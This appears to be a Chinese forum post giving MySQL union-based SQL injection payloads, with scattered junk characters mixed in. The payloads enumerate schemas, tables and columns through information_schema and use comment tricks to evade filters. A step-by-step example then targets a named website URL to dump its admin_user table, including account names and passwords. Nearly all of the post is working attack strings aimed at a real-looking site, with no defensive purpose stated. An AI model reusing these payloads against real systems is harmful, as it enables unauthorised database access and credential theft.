查库" C" l' i" m1 D D) F5 i$ q
1 o, G, x, G, Y* ^$ ` D2 rid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*7 Y( B7 q! W( [2 e3 D; w/ ^
, ~0 B1 ~. ^. [. \, @, I7 r; e! m查表
+ n/ {& P+ [1 e( d: i
9 L0 t; d7 Y, X* }8 R7 sid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
. y K2 x$ o. y) i& b' v& @8 h, Y8 S, Z9 S6 \/ M6 G
查段
' v0 L: x* ^) V% w, s3 U9 a( ?
$ G1 K" L* J0 Q" E" Z6 J& Fid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
# j* o7 v6 g8 j8 }) N
" R8 |- u# W ^- C u! E2 z
8 i" R/ G% ^ W! X( }0 hmysql5高级注入方法暴表
, o" P( N% y2 l7 j
4 p+ i3 y$ W! [+ V; X8 L例子如下:1 j; |, u3 i% d" x/ U* T, Y2 \
+ ]: C, Y `* H8 J1.爆表" ~% U; x1 \9 ?8 q( h3 G d+ S
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)& f. ^9 j9 ]: y' F- M: y V) R
这样爆到第4个时出现了admin_user表。
/ A! O9 H1 E n$ K
6 s0 E8 R9 {# O2 [( a+ o2.暴字段
6 H; k3 v8 V5 h O9 u+ T! fhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
9 @+ B: @: M9 U+ W- P8 w7 R7 B1 }- j, |2 `/ K* U
/ ^4 U6 J" c( f& |
3.爆密码9 f; C( f$ z% a0 [5 F! n
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
" p( F& x5 s9 C* k( L$ z5 x* P7 D# i3 o* \( r3 h' o( ?
" C3 X; D8 C- h) P' Z
|
发表于 2012-9-13 16:29:37
收藏
支持
反对